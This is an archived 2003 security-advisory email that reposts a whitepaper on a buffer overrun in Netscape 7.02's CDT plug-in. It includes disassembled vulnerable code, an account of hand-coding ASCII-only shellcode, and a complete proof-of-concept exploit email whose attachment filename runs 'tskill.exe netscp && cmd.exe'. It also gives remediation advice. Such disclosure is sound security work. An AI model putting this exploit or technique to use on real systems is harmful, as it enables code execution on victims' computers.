[REVS] CDT Plug-in Bug and How to Exploit Vulnerabilities Using Only ASCII Character Set

From: SecuriTeam (support_at_securiteam.com)
Date: 07/16/03

  • Next message: SecuriTeam: "[NT] Flaw in ISA Server Error Pages Could Allow Cross-Site Scripting Attack" 
    To: list@securiteam.com
Date: 16 Jul 2003 11:44:08 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security in Canada

    Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
    We welcome ISPs, system integrators and IT systems resellers
    to promote the most advanced vulnerability assessment solutions today.

    Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

    - - - - - - - - -

      CDT Plug-in Bug and How to Exploit Vulnerabilities Using Only ASCII
    Character Set
    ------------------------------------------------------------------------

    SUMMARY

    This whitepaper describes creation of exploit for classic buffer overrun
    using only subset of ASCII characters.

    DETAILS

    Bug description:
    Netscape 7.02 ships with Client Detection Tool (CDT) plug-in (npcdt.dll)
    that handles application/x-cdt mime type. One of routines in the npcdt.dll
    is suffers from classic buffer overrun. Overrun occurs when overly long
    string is passed to vulnerable routine. This string is essentially full
    path to temporary folder where attachments are saved when browsing mail
    message. Below is fragment of vulnerable routine code that is derived from
    IDA:

    sub_100016FF proc near
       var_100 = byte ptr -100h
       arg_0 = dword ptr 8
       arg_8 = dword ptr 10h
       push ebp
       mov ebp, esp
       sub esp, 100h
       push [ebp+arg_8] // Full path to CDT file in TMP
       mov eax, [ebp+arg_0]
       push dword ptr [eax+8] // "http://www.mozilla.org"
       lea eax, [ebp+var_100]
       push offset aFileAvailableF ; "### File available for %s: %s\n"
       push eax
       call sprintf
       add esp, 10h
       xor eax, eax
       leave
       retn 0Ch
    sub_100016FF endp

    As we see 256 bytes are allocated for local variables and length of
    arguments is not checked.

    Proof-of-concept exploit:
    The main problem is that we cannot fully control arguments passed to the
    function: we can control only part of one argument. This argument is full
    path to Windows temporary folder and name of CDT file that is created when
    mail with attachment of application/x-cdt mime type if viewed by user.
    Example of second argument value:
    C:\Documents and Settings\martin\Local
    Settings\Temp\plugtmp\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAtskill.exe netscp && cmd.exe ATX-%UUU-%UUUFVUUhAAAAZ0TX!
    hqHyaZ)TXehU%yaZ)TXeh%S%SZf)TXj0TXaPyCSP~~~~w$$AAAAA
    AAAAAAAAAAAAAAAWddwAAAAAAAAAAAAPYIIQXIIIIII(DL!x~.CDT

    To exploit this bug we need to create mail with attachment of
    application/x-cdt mime type and filename that contains exploit code.
    Filename including extension cannot exceed 218 symbols in length under
    Windows Server 2003 and cannot contain some special characters like >, <,
    \ and so on. In addition, filename cannot contain non-ASCII symbols to
    make exploit working. Finally, we need to know length of path to TEMP
    folder to code the exploit. This is equivalent to length of username
    because rest of path is known for given operating system if default
    settings are used. Also Martin was unable to find JMP ESP/CALL ESP opcodes
    in loaded Netscape modules with acceptable address (note that acceptable
    here means ASCII with mentioned above restrictions) so proof-of-concept
    exploit is bound to operating system, here Windows Server 2003 Enterprise
    Edition English.

    The main idea is to represent "shellcode" with subset of ASCII characters.
    There are programs that translate ordinal byte code to byte code that
    consists only of "ASCII" symbols. However, such programs normally produce
    code that is significantly greater in size than original. Due to this fact
    proof-of concept exploit is coded manually.

    Here is described what it does:
    1. Upon exit of vulnerable routine in CDT plug-in return address is
    overwritten with JMP ESP opcode address in shell32.dll.
    2. After JMP ESP we land almost at the end of our code and have about 26
    bytes. In this area exploit only decodes bytes to make short jump back to
    126 bytes.
    3. Now we have more area - about 94 bytes. Here exploit decodes CALL
    system opcodes where system is C run time function to execute OS commands
    (implemented in msvcrt.dll).
    4. System function executes command that is hard-coded into exploit code:
    tskill.exe netscp && cmd.exe. Here tskill.exe terminates Netscape to avoid
    cleanup coding and cmd.exe launches command prompt.

    Definitely this is not best approach - better would be write decoder for
    ASCII bytes and make resulting exploit smaller, try to make it less
    platform dependant and make a call to ExitProcess. However, remember that
    this is a proof-of-concept code. Below is mail message with sample
    exploit:
     From: <attacker@host.com>
     To: <victim@host.com>
     Subject: CDT bug Exploit
     Date: Mon, 14 Jul 2003 06:54:20 +0400
     MIME-Version: 1.0
     Content-Type: multipart/mixed;
     boundary="----=_NextPart_000_0011_01C33EA6.3F7AEDE0"
     This is a multi-part message in MIME format.
     ------=_NextPart_000_0011_01C33EA6.3F7AEDE0
     Content-Type: text/plain;
     charset="koi8-r"
     Content-Transfer-Encoding: 7bit
     ------=_NextPart_000_0011_01C33EA6.3F7AEDE0
     Content-Type: application/x-cdt;
     name="jmp.cdt"
     Content-Transfer-Encoding: quoted-printable
     Content-Disposition: attachment;
     filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtskill.exe netscp
     && cmd.exe ATX-%UUU-%UUUFVUUhAAAAZ0TX!
     hqHyaZ)TXehU%yaZ)TXeh%S%SZf)TXj0TXaPyCSP~~~~w$$AAAAAAAAAAAAAAAAAAA
     AWddwAAAAAAAAAAAAPYIIQXIIIIII(DL!x~.CDT"
     TEST MESSAGE ONLY
     ------=_NextPart_000_0011_01C33EA6.3F7AEDE0--

    Because text is wrapped copy of this is available at:
    <http://jimmers.russia.webmatrixhosting.net/exploits/CDT.txt>
    http://jimmers.russia.webmatrixhosting.net/exploits/CDT.txt

    This exploit was tested on Windows Server 2003 Enterprise Edition English
    while logged on as user with 6 symbols username running Netscape 7.02. To
    send such message one may use telnet to SMTP server because some mail
    clients (Outlook Express) change Content-Type from application/x-cdt upon
    sending if Content-Type was set manually in saved message text.

    Resolution:
    Manually remove CDT plug-in from /components directory or upgrade to
    latest version of Netscape browser that has CDT plug-in removed.

    ADDITIONAL INFORMATION

    The original whitepaper can be downloaded from:
    <http://jimmers.russia.webmatrixhosting.net/whitepapers/CDTbug.pdf>
    http://jimmers.russia.webmatrixhosting.net/whitepapers/CDTbug.pdf

    The information has been provided by <mailto:jimmers@yandex.ru> Martin
    Rakhmanoff.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Flaw in ISA Server Error Pages Could Allow Cross-Site Scripting Attack"